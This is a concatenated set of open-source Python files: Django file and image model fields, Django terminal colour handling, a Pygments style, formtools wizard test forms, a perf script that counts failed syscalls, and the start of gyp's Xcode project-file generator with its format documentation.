Until the storage layer, all file paths are expected to be Unix style
(with forward slashes).
"""
if callable(self.upload_to):
filename = self.upload_to(instance, filename)
else:
dirname = datetime.datetime.now().strftime(self.upload_to)
filename = posixpath.join(dirname, filename)
return self.storage.generate_filename(filename)
def save_form_data(self, instance, data):
# Important: None means "no change", other false value means "clear"
# This subtle distinction (rather than a more explicit marker) is
# needed because we need to consume values that are also sane for a
# regular (non Model-) Form to find in its cleaned_data dictionary.
if data is not None:
# This value will be converted to str and stored in the
# database, so leaving False as-is is not acceptable.
if not data:
data = ''
setattr(instance, self.name, data)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FileField, 'max_length': self.max_length}
defaults.update(kwargs)
return super().formfield(**defaults)
class ImageFileDescriptor(FileDescriptor):
"""
Just like the FileDescriptor, but for ImageFields. The only difference is
assigning the width/height to the width_field/height_field, if appropriate.
"""
def __set__(self, instance, value):
previous_file = instance.__dict__.get(self.field.name)
super().__set__(instance, value)
# To prevent recalculating image dimensions when we are instantiating
# an object from the database (bug #11084), only update dimensions if
# the field had a value before this assignment. Since the default
# value for FileField subclasses is an instance of field.attr_class,
# previous_file will only be None when we are called from
# Model.__init__(). The ImageField.update_dimension_fields method
# hooked up to the post_init signal handles the Model.__init__() cases.
# Assignment happening outside of Model.__init__() will trigger the
# update right here.
if previous_file is not None:
self.field.update_dimension_fields(instance, force=True)
class ImageFieldFile(ImageFile, FieldFile):
def delete(self, save=True):
# Clear the image dimensions cache
if hasattr(self, '_dimensions_cache'):
del self._dimensions_cache
super().delete(save)
class ImageField(FileField):
default_validators = [validate_image_file_extension]
attr_class = ImageFieldFile
descriptor_class = ImageFileDescriptor
description = _("Image")
def __init__(self, verbose_name=None, name=None, width_field=None, height_field=None, **kwargs):
self.width_field, self.height_field = width_field, height_field
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_image_library_installed())
return errors
def _check_image_library_installed(self):
try:
from PIL import Image # NOQA
except ImportError:
return [
checks.Error(
'Cannot use ImageField because Pillow is not installed.',
hint=('Get Pillow at https://pypi.python.org/pypi/Pillow '
'or run command "pip install Pillow".'),
obj=self,
id='fields.E210',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.width_field:
kwargs['width_field'] = self.width_field
if self.height_field:
kwargs['height_field'] = self.height_field
return name, path, args, kwargs
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
# Attach update_dimension_fields so that dimension fields declared
# after their corresponding image field don't stay cleared by
# Model.__init__, see bug #11196.
# Only run post-initialization dimension update on non-abstract models
if not cls._meta.abstract:
signals.post_init.connect(self.update_dimension_fields, sender=cls)
def update_dimension_fields(self, instance, force=False, *args, **kwargs):
"""
Update field's width and height fields, if defined.
This method is hooked up to model's post_init signal to update
dimensions after instantiating a model instance. However, dimensions
won't be updated if the dimensions fields are already populated. This
avoids unnecessary recalculation when loading an object from the
database.
Dimensions can be forced to update with force=True, which is how
ImageFileDescriptor.__set__ calls this method.
"""
# Nothing to update if the field doesn't have dimension fields or if
# the field is deferred.
has_dimension_fields = self.width_field or self.height_field
if not has_dimension_fields or self.attname not in instance.__dict__:
return
# getattr will call the ImageFileDescriptor's __get__ method, which
# coerces the assigned value into an instance of self.attr_class
# (ImageFieldFile in this case).
file = getattr(instance, self.attname)
# Nothing to update if we have no file and not being forced to update.
if not file and not force:
return
dimension_fields_filled = not(
(self.width_field and not getattr(instance, self.width_field)) or
(self.height_field and not getattr(instance, self.height_field))
)
# When both dimension fields have values, we are most likely loading
# data from the database or updating an image field that already had
# an image stored. In the first case, we don't want to update the
# dimension fields because we are already getting their values from the
# database. In the second case, we do want to update the dimensions
# fields and will skip this return because force will be True since we
# were called from ImageFileDescriptor.__set__.
if dimension_fields_filled and not force:
return
# file should be an instance of ImageFieldFile or should be None.
if file:
width = file.width
height = file.height
else:
# No file, so clear dimensions fields.
width = None
height = None
# Update the width and height fields.
if self.width_field:
setattr(instance, self.width_field, width)
if self.height_field:
setattr(instance, self.height_field, height)
def formfield(self, **kwargs):
defaults = {'form_class': forms.ImageField}
defaults.update(kwargs)
return super().formfield(**defaults)
| bsd-3-clause |
Medigate/cutiuta-server | cutiuta-server/env/lib/python3.4/site-packages/django/utils/termcolors.py | 87 | 7302 | """
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = {color_names[x]: '3%s' % x for x in range(8)}
background = {color_names[x]: '4%s' % x for x in range(8)}
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
"""
Returns your text, enclosed in ANSI graphics codes.
Depends on the keyword arguments 'fg' and 'bg', and the contents of
the opts tuple/list.
Returns the RESET code if no parameters are given.
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold'
'underscore'
'blink'
'reverse'
'conceal'
'noreset' - string will not be auto-terminated with the RESET code
Examples:
colorize('hello', fg='red', bg='blue', opts=('blink',))
colorize()
colorize('goodbye', opts=('underscore',))
print(colorize('first line', fg='red', opts=('noreset',)))
print('this should be red too')
print(colorize('and so should this'))
print('this should not be red')
"""
code_list = []
if text == '' and len(opts) == 1 and opts[0] == 'reset':
return '\x1b[%sm' % RESET
for k, v in six.iteritems(kwargs):
if k == 'fg':
code_list.append(foreground[v])
elif k == 'bg':
code_list.append(background[v])
for o in opts:
if o in opt_dict:
code_list.append(opt_dict[o])
if 'noreset' not in opts:
text = '%s\x1b[%sm' % (text or '', RESET)
return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
"""
Returns a function with default parameters for colorize()
Example:
bold_red = make_style(opts=('bold',), fg='red')
print(bold_red('hello'))
KEYWORD = make_style(fg='yellow')
COMMENT = make_style(fg='blue', opts=('bold',))
"""
return lambda text: colorize(text, opts, **kwargs)
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'SUCCESS': {},
'WARNING': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'WARNING': {'fg': 'yellow', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
"""Parse a DJANGO_COLORS environment variable to produce the system palette
The general form of a palette definition is:
"palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"
where:
palette is a named palette; one of 'light', 'dark', or 'nocolor'.
role is a named style used by Django
fg is a foreground color.
bg is a background color.
option is a display option.
Specifying a named palette is the same as manually specifying the individual
definitions for each role. Any individual definitions following the palette
definition will augment the base palette definition.
Valid roles:
'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
'http_info', 'http_success', 'http_redirect', 'http_bad_request',
'http_not_found', 'http_server_error'
Valid colors:
'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'
Valid options:
'bold', 'underscore', 'blink', 'reverse', 'conceal'
"""
if not config_string:
return PALETTES[DEFAULT_PALETTE]
# Split the color configuration into parts
parts = config_string.lower().split(';')
palette = PALETTES[NOCOLOR_PALETTE].copy()
for part in parts:
if part in PALETTES:
# A default palette has been specified
palette.update(PALETTES[part])
elif '=' in part:
# Process a palette defining string
definition = {}
# Break the definition into the role,
# plus the list of specific instructions.
# The role must be in upper case
role, instructions = part.split('=')
role = role.upper()
styles = instructions.split(',')
styles.reverse()
# The first instruction can contain a slash
# to break apart fg/bg.
colors = styles.pop().split('/')
colors.reverse()
fg = colors.pop()
if fg in color_names:
definition['fg'] = fg
if colors and colors[-1] in color_names:
definition['bg'] = colors[-1]
# All remaining instructions are options
opts = tuple(s for s in styles if s in opt_dict.keys())
if opts:
definition['opts'] = opts
# The nocolor palette has all available roles.
# Use that palette as the basis for determining
# if the role is valid.
if role in PALETTES[NOCOLOR_PALETTE] and definition:
palette[role] = definition
# If there are no colors specified, return the empty palette.
if palette == PALETTES[NOCOLOR_PALETTE]:
return None
return palette
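# Illustrative sketch (not part of the original module): how a hypothetical
# DJANGO_COLORS-style string maps onto the palette built above.
#
#   palette = parse_color_setting('light;error=yellow/blue,blink;notice=magenta')
#   palette['ERROR'] == {'fg': 'yellow', 'bg': 'blue', 'opts': ('blink',)}
#   palette['NOTICE'] == {'fg': 'magenta'}
#
# All other roles keep the values inherited from the 'light' base palette.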
| gpl-3.0 |
javierTerry/odoo | addons/web/doc/_themes/flask_theme_support.py | 2228 | 4875 | # flasky extensions. flasky pygments style based on tango style
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
class FlaskyStyle(Style):
background_color = "#f8f8f8"
default_style = ""
styles = {
# No corresponding class for the following:
#Text: "", # class: ''
Whitespace: "underline #f8f8f8", # class: 'w'
Error: "#a40000 border:#ef2929", # class: 'err'
Other: "#000000", # class 'x'
Comment: "italic #8f5902", # class: 'c'
Comment.Preproc: "noitalic", # class: 'cp'
Keyword: "bold #004461", # class: 'k'
Keyword.Constant: "bold #004461", # class: 'kc'
Keyword.Declaration: "bold #004461", # class: 'kd'
Keyword.Namespace: "bold #004461", # class: 'kn'
Keyword.Pseudo: "bold #004461", # class: 'kp'
Keyword.Reserved: "bold #004461", # class: 'kr'
Keyword.Type: "bold #004461", # class: 'kt'
Operator: "#582800", # class: 'o'
Operator.Word: "bold #004461", # class: 'ow' - like keywords
Punctuation: "bold #000000", # class: 'p'
# because special names such as Name.Class, Name.Function, etc.
# are not recognized as such later in the parsing, we choose them
# to look the same as ordinary variables.
Name: "#000000", # class: 'n'
Name.Attribute: "#c4a000", # class: 'na' - to be revised
Name.Builtin: "#004461", # class: 'nb'
Name.Builtin.Pseudo: "#3465a4", # class: 'bp'
Name.Class: "#000000", # class: 'nc' - to be revised
Name.Constant: "#000000", # class: 'no' - to be revised
Name.Decorator: "#888", # class: 'nd' - to be revised
Name.Entity: "#ce5c00", # class: 'ni'
Name.Exception: "bold #cc0000", # class: 'ne'
Name.Function: "#000000", # class: 'nf'
Name.Property: "#000000", # class: 'py'
Name.Label: "#f57900", # class: 'nl'
Name.Namespace: "#000000", # class: 'nn' - to be revised
Name.Other: "#000000", # class: 'nx'
Name.Tag: "bold #004461", # class: 'nt' - like a keyword
Name.Variable: "#000000", # class: 'nv' - to be revised
Name.Variable.Class: "#000000", # class: 'vc' - to be revised
Name.Variable.Global: "#000000", # class: 'vg' - to be revised
Name.Variable.Instance: "#000000", # class: 'vi' - to be revised
Number: "#990000", # class: 'm'
Literal: "#000000", # class: 'l'
Literal.Date: "#000000", # class: 'ld'
String: "#4e9a06", # class: 's'
String.Backtick: "#4e9a06", # class: 'sb'
String.Char: "#4e9a06", # class: 'sc'
String.Doc: "italic #8f5902", # class: 'sd' - like a comment
String.Double: "#4e9a06", # class: 's2'
String.Escape: "#4e9a06", # class: 'se'
String.Heredoc: "#4e9a06", # class: 'sh'
String.Interpol: "#4e9a06", # class: 'si'
String.Other: "#4e9a06", # class: 'sx'
String.Regex: "#4e9a06", # class: 'sr'
String.Single: "#4e9a06", # class: 's1'
String.Symbol: "#4e9a06", # class: 'ss'
Generic: "#000000", # class: 'g'
Generic.Deleted: "#a40000", # class: 'gd'
Generic.Emph: "italic #000000", # class: 'ge'
Generic.Error: "#ef2929", # class: 'gr'
Generic.Heading: "bold #000080", # class: 'gh'
Generic.Inserted: "#00A000", # class: 'gi'
Generic.Output: "#888", # class: 'go'
Generic.Prompt: "#745334", # class: 'gp'
Generic.Strong: "bold #000000", # class: 'gs'
Generic.Subheading: "bold #800080", # class: 'gu'
Generic.Traceback: "bold #a40000", # class: 'gt'
}
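# Illustrative sketch (not part of the original file): rendering a snippet
# with this style via Pygments, assuming the pygments package is installed.
#
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   from pygments.formatters import HtmlFormatter
#
#   html = highlight("print('hi')", PythonLexer(), HtmlFormatter(style=FlaskyStyle))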
| agpl-3.0 |
wfxiang08/django178 | django/contrib/formtools/tests/wizard/namedwizardtests/forms.py | 95 | 1760 | import os
import tempfile
from django import forms
from django.core.files.storage import FileSystemStorage
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.template import Template, Context
from django.contrib.auth.models import User
from django.contrib.formtools.wizard.views import NamedUrlWizardView
temp_storage_location = tempfile.mkdtemp(dir=os.environ.get('DJANGO_TEST_TEMP_DIR'))
temp_storage = FileSystemStorage(location=temp_storage_location)
class Page1(forms.Form):
name = forms.CharField(max_length=100)
user = forms.ModelChoiceField(queryset=User.objects.all())
thirsty = forms.NullBooleanField()
class Page2(forms.Form):
address1 = forms.CharField(max_length=100)
address2 = forms.CharField(max_length=100)
file1 = forms.FileField()
class Page3(forms.Form):
random_crap = forms.CharField(max_length=100)
Page4 = formset_factory(Page3, extra=2)
class ContactWizard(NamedUrlWizardView):
file_storage = temp_storage
def done(self, form_list, **kwargs):
c = Context({
'form_list': [x.cleaned_data for x in form_list],
'form_dict': kwargs.get('form_dict'),
'all_cleaned_data': self.get_all_cleaned_data()
})
for form in self.form_list.keys():
c[form] = self.get_cleaned_data_for_step(form)
c['this_will_fail'] = self.get_cleaned_data_for_step('this_will_fail')
return HttpResponse(Template('').render(c))
class SessionContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.session.SessionStorage'
class CookieContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.cookie.CookieStorage'
| bsd-3-clause |
Evil-Green/Lonas_KL-GT-I9300 | tools/perf/scripts/python/failed-syscalls-by-pid.py | 11180 | 2058 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
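# Example invocations (illustrative; the comm/pid values are hypothetical):
#   perf script -s failed-syscalls-by-pid.py          # all processes
#   perf script -s failed-syscalls-by-pid.py firefox  # only the 'firefox' comm
#   perf script -s failed-syscalls-by-pid.py 1234     # only pid 1234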
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
ikona23/driftsuspensions | node_modules/node-gyp/gyp/pylib/gyp/xcodeproj_file.py | 1366 | 120842 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Xcode project file generator.
This module is both an Xcode project file generator and a documentation of the
Xcode project file format. Knowledge of the project file format was gained
based on extensive experience with Xcode, and by making changes to projects in
Xcode.app and observing the resultant changes in the associated project files.
XCODE PROJECT FILES
The generator targets the file format as written by Xcode 3.2 (specifically,
3.2.6), but past experience has taught that the format has not changed
significantly in the past several years, and future versions of Xcode are able
to read older project files.
Xcode project files are "bundled": the project "file" from an end-user's
perspective is actually a directory with an ".xcodeproj" extension. The
project file from this module's perspective is actually a file inside this
directory, always named "project.pbxproj". This file contains a complete
description of the project and is all that is needed to use the xcodeproj.
Other files contained in the xcodeproj directory are simply used to store
per-user settings, such as the state of various UI elements in the Xcode
application.
The project.pbxproj file is a property list, stored in a format almost
identical to the NeXTstep property list format. The file is able to carry
Unicode data, and is encoded in UTF-8. The root element in the property list
is a dictionary that contains several properties of minimal interest, and two
properties of immense interest. The most important property is a dictionary
named "objects". The entire structure of the project is represented by the
children of this property. The objects dictionary is keyed by unique 96-bit
values represented by 24 uppercase hexadecimal characters. Each value in the
objects dictionary is itself a dictionary, describing an individual object.
Each object in the dictionary is a member of a class, which is identified by
the "isa" property of each object. A variety of classes are represented in a
project file. Objects can refer to other objects by ID, using the 24-character
hexadecimal object key. A project's objects form a tree, with a root object
of class PBXProject at the root. As an example, the PBXProject object serves
as parent to an XCConfigurationList object defining the build configurations
used in the project, a PBXGroup object serving as a container for all files
referenced in the project, and a list of target objects, each of which defines
a target in the project. There are several different types of target object,
such as PBXNativeTarget and PBXAggregateTarget. In this module, this
relationship is expressed by having each target type derive from an abstract
base named XCTarget.
The project.pbxproj file's root dictionary also contains a property, sibling to
the "objects" dictionary, named "rootObject". The value of rootObject is a
24-character object key referring to the root PBXProject object in the
objects dictionary.
In Xcode, every file used as input to a target or produced as a final product
of a target must appear somewhere in the hierarchy rooted at the PBXGroup
object referenced by the PBXProject's mainGroup property. A PBXGroup is
generally represented as a folder in the Xcode application. PBXGroups can
contain other PBXGroups as well as PBXFileReferences, which are pointers to
actual files.
Each XCTarget contains a list of build phases, represented in this module by
the abstract base XCBuildPhase. Examples of concrete XCBuildPhase derivations
are PBXSourcesBuildPhase and PBXFrameworksBuildPhase, which correspond to the
"Compile Sources" and "Link Binary With Libraries" phases displayed in the
Xcode application. Files used as input to these phases (for example, source
files in the former case and libraries and frameworks in the latter) are
represented by PBXBuildFile objects, referenced by elements of "files" lists
in XCTarget objects. Each PBXBuildFile object refers to a PBXBuildFile
object as a "weak" reference: it does not "own" the PBXBuildFile, which is
owned by the root object's mainGroup or a descendant group. In most cases, the
layer of indirection between an XCBuildPhase and a PBXFileReference via a
PBXBuildFile appears extraneous, but there's actually one reason for this:
file-specific compiler flags are added to the PBXBuildFile object so as to
allow a single file to be a member of multiple targets while having distinct
compiler flags for each. These flags can be modified in the Xcode application
in the "Build" tab of a File Info window.
When a project is open in the Xcode application, Xcode will rewrite it. As
such, this module is careful to adhere to the formatting used by Xcode, to
avoid insignificant changes appearing in the file when it is used in the
Xcode application. This will keep version control repositories happy, and
makes it possible to compare a project file used in Xcode to one generated by
this module to determine if any significant changes were made in the
application.
Xcode has its own way of assigning 24-character identifiers to each object,
which is not duplicated here. Because the identifier is only generated
once, when an object is created, and is then left unchanged, there is no need
to attempt to duplicate Xcode's behavior in this area. The generator is free
to select any identifier, even at random, to refer to the objects it creates,
and Xcode will retain those identifiers and use them when subsequently
rewriting the project file. However, the generator would choose new random
identifiers each time the project files are generated, leading to difficulties
comparing "used" project files to "pristine" ones produced by this module,
and causing the appearance of changes as every object identifier is changed
when updated projects are checked in to a version control repository. To
mitigate this problem, this module chooses identifiers in a more deterministic
way, by hashing a description of each object as well as its parent and ancestor
objects. This strategy should result in minimal "shift" in IDs as successive
generations of project files are produced.
THIS MODULE
This module introduces several classes, all derived from the XCObject class.
Nearly all of the "brains" are built into the XCObject class, which understands
how to create and modify objects, maintain the proper tree structure, compute
identifiers, and print objects. For the most part, classes derived from
XCObject need only provide a _schema class object, a dictionary that
expresses what properties objects of the class may contain.
Given this structure, it's possible to build a minimal project file by creating
objects of the appropriate types and making the proper connections:
config_list = XCConfigurationList()
group = PBXGroup()
project = PBXProject({'buildConfigurationList': config_list,
'mainGroup': group})
With the project object set up, it can be added to an XCProjectFile object.
XCProjectFile is a pseudo-class in the sense that it is a concrete XCObject
subclass that does not actually correspond to a class type found in a project
file. Rather, it is used to represent the project file's root dictionary.
Printing an XCProjectFile will print the entire project file, including the
full "objects" dictionary.
project_file = XCProjectFile({'rootObject': project})
project_file.ComputeIDs()
project_file.Print()
Xcode project files are always encoded in UTF-8. This module will accept
strings of either the str class or the unicode class. Strings of class str
are assumed to already be encoded in UTF-8. Obviously, if you're just using
ASCII, you won't encounter difficulties because ASCII is a UTF-8 subset.
Strings of class unicode are handled properly and encoded in UTF-8 when
a project file is output.
"""
import gyp.common
import posixpath
import re
import struct
import sys
# hashlib is supplied as of Python 2.5 as the replacement interface for sha
# and other secure hashes. In 2.6, sha is deprecated. Import hashlib if
# available, avoiding a deprecation warning under 2.6. Import sha otherwise,
# preserving 2.4 compatibility.
try:
import hashlib
_new_sha1 = hashlib.sha1
except ImportError:
import sha
_new_sha1 = sha.new
# See XCObject._EncodeString. This pattern is used to determine when a string
# can be printed unquoted. Strings that match this pattern may be printed
# unquoted. Strings that do not match must be quoted and may be further
# transformed to be properly encoded. Note that this expression matches the
# characters listed with "+", for 1 or more occurrences: if a string is empty,
# it must not match this pattern, because it needs to be encoded as "".
_unquoted = re.compile('^[A-Za-z0-9$./_]+$')
# Strings that match this pattern are quoted regardless of what _unquoted says.
# Oddly, Xcode will quote any string with a run of three or more underscores.
_quoted = re.compile('___')
# This pattern should match any character that needs to be escaped by
# XCObject._EncodeString. See that function.
_escaped = re.compile('[\\\\"]|[\x00-\x1f]')
# Used by SourceTreeAndPathFromPath
_path_leading_variable = re.compile(r'^\$\((.*?)\)(/(.*))?$')
def SourceTreeAndPathFromPath(input_path):
"""Given input_path, returns a tuple with sourceTree and path values.
Examples:
input_path (source_tree, output_path)
'$(VAR)/path' ('VAR', 'path')
'$(VAR)' ('VAR', None)
'path' (None, 'path')
"""
source_group_match = _path_leading_variable.match(input_path)
if source_group_match:
source_tree = source_group_match.group(1)
output_path = source_group_match.group(3) # This may be None.
else:
source_tree = None
output_path = input_path
return (source_tree, output_path)
def ConvertVariablesToShellSyntax(input_string):
return re.sub(r'\$\((.*?)\)', '${\\1}', input_string)
class XCObject(object):
"""The abstract base of all class types used in Xcode project files.
Class variables:
_schema: A dictionary defining the properties of this class. The keys to
_schema are string property keys as used in project files. Values
are a list of four or five elements:
[ is_list, property_type, is_strong, is_required, default ]
is_list: True if the property described is a list, as opposed
to a single element.
property_type: The type to use as the value of the property,
or if is_list is True, the type to use for each
element of the value's list. property_type must
be an XCObject subclass, or one of the built-in
types str, int, or dict.
is_strong: If property_type is an XCObject subclass, is_strong
is True to assert that this class "owns," or serves
as parent, to the property value (or, if is_list is
True, values). is_strong must be False if
property_type is not an XCObject subclass.
is_required: True if the property is required for the class.
Note that is_required being True does not preclude
an empty string ("", in the case of property_type
str) or list ([], in the case of is_list True) from
being set for the property.
default: Optional. If is_required is True, default may be set
to provide a default value for objects that do not supply
their own value. If is_required is True and default
is not provided, users of the class must supply their own
value for the property.
Note that although the values of the array are expressed in
boolean terms, subclasses provide values as integers to conserve
horizontal space.
_should_print_single_line: False in XCObject. Subclasses whose objects
should be written to the project file in the
alternate single-line format, such as
PBXFileReference and PBXBuildFile, should
set this to True.
_encode_transforms: Used by _EncodeString to encode unprintable characters.
The index into this list is the ordinal of the
character to transform; each value is a string
used to represent the character in the output. XCObject
provides an _encode_transforms list suitable for most
XCObject subclasses.
_alternate_encode_transforms: Provided for subclasses that wish to use
the alternate encoding rules. Xcode seems
to use these rules when printing objects in
single-line format. Subclasses that desire
this behavior should set _encode_transforms
to _alternate_encode_transforms.
_hashables: A list of XCObject subclasses that can be hashed by ComputeIDs
to construct this object's ID. Most classes that need custom
hashing behavior should do it by overriding Hashables,
but in some cases an object's parent may wish to push a
hashable value into its child, and it can do so by appending
to _hashables.
Attributes:
id: The object's identifier, a 24-character uppercase hexadecimal string.
Usually, objects being created should not set id until the entire
project file structure is built. At that point, UpdateIDs() should
be called on the root object to assign deterministic values for id to
each object in the tree.
parent: The object's parent. This is set by a parent XCObject when a child
object is added to it.
_properties: The object's property dictionary. An object's properties are
described by its class' _schema variable.
"""
_schema = {}
_should_print_single_line = False
# See _EncodeString.
_encode_transforms = []
i = 0
while i < ord(' '):
_encode_transforms.append('\\U%04x' % i)
i = i + 1
_encode_transforms[7] = '\\a'
_encode_transforms[8] = '\\b'
_encode_transforms[9] = '\\t'
_encode_transforms[10] = '\\n'
_encode_transforms[11] = '\\v'
_encode_transforms[12] = '\\f'
_encode_transforms[13] = '\\n'
_alternate_encode_transforms = list(_encode_transforms)
_alternate_encode_transforms[9] = chr(9)
_alternate_encode_transforms[10] = chr(10)
_alternate_encode_transforms[11] = chr(11)
def __init__(self, properties=None, id=None, parent=None):
self.id = id
self.parent = parent
self._properties = {}
self._hashables = []
self._SetDefaultsFromSchema()
self.UpdateProperties(properties)
def __repr__(self):
try:
name = self.Name()
except NotImplementedError:
return '<%s at 0x%x>' % (self.__class__.__name__, id(self))
return '<%s %r at 0x%x>' % (self.__class__.__name__, name, id(self))
def Copy(self):
"""Make a copy of this object.
The new object will have its own copy of lists and dicts. Any XCObject
objects owned by this object (marked "strong") will be copied in the
new object, even those found in lists. If this object has any weak
references to other XCObjects, the same references are added to the new
object without making a copy.
"""
that = self.__class__(id=self.id, parent=self.parent)
for key, value in self._properties.iteritems():
is_strong = self._schema[key][2]
if isinstance(value, XCObject):
if is_strong:
new_value = value.Copy()
new_value.parent = that
that._properties[key] = new_value
else:
that._properties[key] = value
elif isinstance(value, str) or isinstance(value, unicode) or \
isinstance(value, int):
that._properties[key] = value
elif isinstance(value, list):
if is_strong:
# If is_strong is True, each element is an XCObject, so it's safe to
# call Copy.
that._properties[key] = []
for item in value:
new_item = item.Copy()
new_item.parent = that
that._properties[key].append(new_item)
else:
that._properties[key] = value[:]
elif isinstance(value, dict):
# dicts are never strong.
if is_strong:
raise TypeError('Strong dict for key ' + key + ' in ' + \
self.__class__.__name__)
else:
that._properties[key] = value.copy()
else:
raise TypeError('Unexpected type ' + value.__class__.__name__ + \
' for key ' + key + ' in ' + self.__class__.__name__)
return that
def Name(self):
"""Return the name corresponding to an object.
Not all objects necessarily need to be nameable, and not all that do have
a "name" property. Override as needed.
"""
# If the schema indicates that "name" is required, try to access the
# property even if it doesn't exist. This will result in a KeyError
# being raised for the property that should be present, which seems more
# appropriate than NotImplementedError in this case.
if 'name' in self._properties or \
('name' in self._schema and self._schema['name'][3]):
return self._properties['name']
raise NotImplementedError(self.__class__.__name__ + ' must implement Name')
def Comment(self):
"""Return a comment string for the object.
Most objects just use their name as the comment, but PBXProject uses
different values.
The returned comment is not escaped and does not have any comment marker
strings applied to it.
"""
return self.Name()
def Hashables(self):
hashables = [self.__class__.__name__]
name = self.Name()
if name != None:
hashables.append(name)
hashables.extend(self._hashables)
return hashables
def HashablesForChild(self):
return None
def ComputeIDs(self, recursive=True, overwrite=True, seed_hash=None):
"""Set "id" properties deterministically.
An object's "id" property is set based on a hash of its class type and
name, as well as the class type and name of all ancestor objects. As
such, it is only advisable to call ComputeIDs once an entire project file
tree is built.
